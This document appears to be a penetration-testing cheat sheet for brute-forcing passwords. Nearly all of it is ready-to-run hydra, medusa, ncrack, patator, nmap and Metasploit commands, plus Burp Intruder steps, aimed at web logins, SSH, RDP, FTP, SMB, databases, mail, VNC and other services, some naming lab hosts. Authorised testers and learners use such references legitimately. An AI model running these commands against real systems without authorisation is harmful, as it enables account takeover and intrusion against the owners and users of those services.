# Brute-force service password

### Web <a href="#web" id="web"></a>

```
hydra 10.0.0.1 http-post-form "/admin.php:target=auth&mode=login&user=^USER^&password=^PASS^:invalid" -P /usr/share/wordlists/rockyou.txt -l admin
```

#### Logins <a href="#logins" id="logins"></a>

Use Burp Suite.

1. Intercept a login attempt.
2. Right-click and choose "Send to Intruder". Select Sniper if you have only one field you want to brute-force, for example when you already know the username. Otherwise select cluster-attack.
3. Select your payload, your wordlist.
4. Click attack.
5. Look for a response length that differs from the rest.

#### HTTP Basic Auth <a href="#http-basic-auth" id="http-basic-auth"></a>

```
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/
medusa -h <IP> -u <username> -P <passwords.txt> -M http -m DIR:/path/to/auth -T 10
```

#### HTTP - Post Form <a href="#http-post-form" id="http-post-form"></a>

```
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V
```

#### HTTP - CMS -- (W)ordpress, (J)oomla or (D)rupal or (M)oodle <a href="#http-cms-w-ordpress-j-oomla-or-d-rupal-or-m-oodle" id="http-cms-w-ordpress-j-oomla-or-d-rupal-or-m-oodle"></a>

```
cmsmap -f W/J/D/M -u a -p a https://wordpress.com
```

#### Hydra attack http get 401 login with a dictionary <a href="#hydra-attack-http-get-401-login-with-a-dictionary" id="hydra-attack-http-get-401-login-with-a-dictionary"></a>

```
hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin
```

### SSH <a href="#ssh" id="ssh"></a>

```
hydra -l admin -P /usr/share/wordlists/rockyou.txt -o results.txt ssh://$ip
```

```
hydra -v -V -u -L users.txt -P passwords.txt -t 1 $ip ssh
```

```
hydra -v -V -u -L users.txt -p "" -t 1 $ip ssh
```

```
hydra -l root -P wordlist.txt $ip ssh
```

```
hydra -L userlist.txt -P best1050.txt $ip -s 22 ssh -V
```

```
hydra -l root -P passwords.txt [-t 32] <IP> ssh
```

```
ncrack -p 22 --user root -P passwords.txt <IP> [-T 5]
```

```
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ssh
```

### SNMP <a href="#snmp" id="snmp"></a>

```
hydra -P wordlist.txt -v $ip snmp
```

```
nmap -sU --script snmp-brute <target> [--script-args snmp-brute.communitiesdb=<wordlist> ]
```

```
onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp_onesixtyone.txt <IP>
```

```
hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmp
```

### Remote Desktop Protocol <a href="#remote-desktop-protocol" id="remote-desktop-protocol"></a>

```
ncrack -vv --user admin -P password-file.txt rdp://$ip
```

```
ncrack -vv --user <User> -P pwds.txt rdp://<IP>
```

```
hydra -V -f -L <userslist> -P <passwlist> rdp://<IP>
hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip
```

### AFP <a href="#afp" id="afp"></a>

```
nmap -p 548 --script afp-brute <IP>
```

### AJP <a href="#ajp" id="ajp"></a>

```
nmap --script ajp-brute -p 8009 <IP>
```

### Cassandra Apache <a href="#cassandra-apache" id="cassandra-apache"></a>

```
nmap --script cassandra-brute -p 9160 <IP>
```

### CouchDB <a href="#couchdb" id="couchdb"></a>

```
msf> use auxiliary/scanner/couchdb/couchdb_login
```

### FTP <a href="#ftp" id="ftp"></a>

```
hydra -l root -P passwords.txt [-t 32] <IP> ftp
ncrack -p 21 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ftp
```

### IMAP <a href="#imap" id="imap"></a>

```
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> imap -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f <IP> imap -V
nmap -sV --script imap-brute -p <PORT> <IP>
```

### IRC <a href="#irc" id="irc"></a>

```
nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p <PORT> <IP>
```

### ISCSI <a href="#iscsi" id="iscsi"></a>

```
nmap -sV --script iscsi-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 3260 <IP>
```

### LDAP <a href="#ldap" id="ldap"></a>

```
nmap --script ldap-brute -p 389 <IP>
```

```
hydra -L users.txt -P passwords.txt $ip ldap2 -V -f
```

### Mongo <a href="#mongo" id="mongo"></a>

```
nmap -sV --script mongodb-brute -n -p 27017 <IP>
```

### MySQL <a href="#mysql" id="mysql"></a>

```
hydra -L usernames.txt -P pass.txt <IP> mysql
```

### OracleSQL <a href="#oraclesql" id="oraclesql"></a>

```
pip3 install cx_Oracle --upgrade
patator oracle_login sid=<SID> host=<IP> user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017
```

```
./odat.py passwordguesser -s $SERVER -d $SID
./odat.py passwordguesser -s $MYSERVER -p $PORT --accounts-file accounts_multiple.txt
```

```
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=<SID> <IP>
```

```
nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30
john hashes.txt
```

### POP3 <a href="#pop3" id="pop3"></a>

```
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V
```

```
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f <IP> pop3 -V
```

### PostgreSQL <a href="#postgresql" id="postgresql"></a>

```
hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt <IP> postgres
```

```
medusa -h <IP> -U /root/Desktop/user.txt -P /root/Desktop/pass.txt -M postgres
```

```
ncrack -v -U /root/Desktop/user.txt -P /root/Desktop/pass.txt <IP>:5432
```

```
patator pgsql_login host=<IP> user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt
```

```
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>
```

### PPTP <a href="#pptp" id="pptp"></a>

```
cat rockyou.txt | thc-pptp-bruter -u <Username> <IP>
```

### Redis <a href="#redis" id="redis"></a>

```
nmap --script redis-brute -p 6379 <IP>
hydra -P /path/pass.txt <IP> redis
```

### Rexec <a href="#rexec" id="rexec"></a>

```
hydra -l <username> -P <password_file> rexec://<Victim-IP> -v -V
```

### Rlogin <a href="#rlogin" id="rlogin"></a>

```
hydra -l <username> -P <password_file> rlogin://<Victim-IP> -v -V
```

### Rsh <a href="#rsh" id="rsh"></a>

```
hydra -L <Username_list> rsh://<Victim_IP> -v -V
```

[http://pentestmonkey.net/tools/misc/rsh-grind](http://pentestmonkey.net/tools/misc/rsh-grind)

### Rsync <a href="#rsync" id="rsync"></a>

```
nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 <IP>
```

### RTSP <a href="#rtsp" id="rtsp"></a>

```
hydra -l root -P passwords.txt <IP> rtsp
```

### SMB <a href="#smb" id="smb"></a>

```
nmap --script smb-brute -p 445 <IP>

hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1
```

### Telnet <a href="#telnet" id="telnet"></a>

```
hydra -l root -P passwords.txt [-t 32] <IP> telnet
ncrack -p 23 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M telnet
```

### VNC <a href="#vnc" id="vnc"></a>

```
hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt -s <PORT> <IP> vnc
medusa -h <IP> -u root -P /root/Desktop/pass.txt -M vnc
ncrack -V --user root -P /root/Desktop/pass.txt <IP>:<PORT>
```

```
patator vnc_login host=<IP> password=FILE0 0=/root/Desktop/pass.txt -t 1 -x retry:fgrep!='Authentication failure' --max-retries 0 -x quit:code=0
msf> use auxiliary/scanner/vnc/vnc_login
```

### SMTP <a href="#smtp" id="smtp"></a>

```
hydra -P /usr/share/wordlists/nmap.lst $ip smtp -V
```
